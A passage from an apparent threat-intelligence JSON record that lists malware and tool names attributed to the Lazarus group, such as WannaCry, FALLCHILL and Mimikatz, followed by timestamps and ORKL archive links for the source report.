				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434653,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a3b6bbd6f3466af0804e0ff6857529171728d88a.pdf",
		"text": "https://archive.orkl.eu/a3b6bbd6f3466af0804e0ff6857529171728d88a.txt",
		"img": "https://archive.orkl.eu/a3b6bbd6f3466af0804e0ff6857529171728d88a.jpg"
	}
}